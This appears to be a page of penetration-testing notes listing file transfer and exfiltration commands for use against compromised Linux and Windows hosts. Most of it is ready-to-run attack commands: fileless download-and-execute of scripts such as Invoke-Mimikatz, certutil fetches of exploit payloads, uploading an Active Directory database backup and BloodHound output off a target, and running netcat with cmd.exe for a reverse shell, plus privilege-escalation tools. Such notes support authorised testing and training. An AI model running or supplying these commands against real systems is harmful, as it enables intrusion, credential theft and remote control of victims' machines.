File Transfers

File Transfer Methods

When transferring files to Linux, use /dev/shm (which operates in memory) or /tmp (temporary storage). On Windows, the equivalent temporary directories are TEMP or TMP.

HTTP

python3 -m http.server 80
ruby -run -e httpd . -p 80

Download using wget & cURL

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
curl -O http://10.10.14.30/agent
curl.exe -O http://10.10.14.30/agent.exe

# Fileless Download
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

# Note: Some payloads such as mkfifo write files to disk.

FTP

pip3 install pyftpdlib
python3 -m pyftpdlib --port 21

ftp <IP>
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\Users\Public\ftp-file.txt')

Servers

# Webdav
apt install python3-wsgidav
mkdir webdav && touch webdav/test.txt
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root webdav

# Python Uploadserver
pip install uploadserver
python3 -m uploadserver --basic-auth hello:world
python3 -m uploadserver 8000
curl -X POST http://192.168.45.195:8000/upload -F [email protected]
cmd /c "curl -X POST http://192.168.40.120:8000/upload -F files=@C:\\Users\Marcus\20241025052509_BloodHound.zip"

SCP

# Start
service ssh status
service ssh start

# Transfer from target
scp C:\ntds.dit.bak [email protected]:/root/

# Remote to local 
scp user@from_host:file.txt /local/directory/

# Local to remote
scp file.txt user@to_host:/remote/directory/

Certutil

certutil -urlcache -split -f http://192.168.49.67/exploit.ps1 exploit.ps1

Powershell

# Download PowerView
(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')

# File Download
(New-Object Net.WebClient).DownloadFile('<URL>','<Output File Name>') 

# File Download Async
(New-Object Net.WebClient).DownloadFileAsync('<URL>','<Output File Name>')

# Fileless Download to Memory using Invoke-Expression (IEX)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

# Pipeline input
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX

# IWR
iwr -uri http://<URL>/winPEASx64.exe -Outfile winPEAS.exe
powershell -c iwr -uri http://10.14.30.76/PrintSpoofer64.exe -o print.exe
powershell -c curl http://10.14.30.76/PrintSpoofer64.exe -o print.exe
print.exe -i -c cmd

RDP

# Mounting Linux Folder using rdesktop
rdesktop 192.168.165.195 -d DOMAIN -u user -p pass -r disk:linux='/root/rdesktop/files'

# Mounting Linux Folder using xfreerdp
xfreerdp /d: /u:user /p:pass /v:192.168.165.195 /drive:linux,/opt/transfer /w:1400 /h:900

SMB

# Set up a share on kali to share files
impacket-smbserver -smb2support share .

# Transfer from target
copy file.txt \\192.168.45.195\share

NXC

--put-file /opt/tools/nc64.exe c:\\Users\\Public\\nc64.exe
-x "c:\\Users\\Public\\nc64.exe -e cmd.exe 192.168.45.215 443"

-x 'reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"'
--put-file /opt/tools/GodPotato-NET4.exe C:\\windows\\temp\\GodPotato-NET4.exe
rlwrap nc -lvnp 443

Exfiltration

LOTS Project - Living Off Trusted Siteslots-project.com

Outbound Port Connectivity

Verify if outbound port connectivity is restricted, as this is key for maintaining access or exfiltrating data. To test, run:

nmap -sT -p4444-4450 portquiz.net

# IP - https://ipv4.icanhazip.com

Via DNS

PreviousEvasion NextEnumerating Services

Last updated 14 days ago

hashtagFile Transfer Methods

hashtagHTTP

hashtagDownload using wget & cURL

hashtagFTP

hashtagServers

hashtagSCP

hashtagCertutil

hashtagPowershell

hashtagRDP

hashtagSMB

hashtagNXC

hashtagExfiltration

hashtagOutbound Port Connectivity

hashtagVia DNS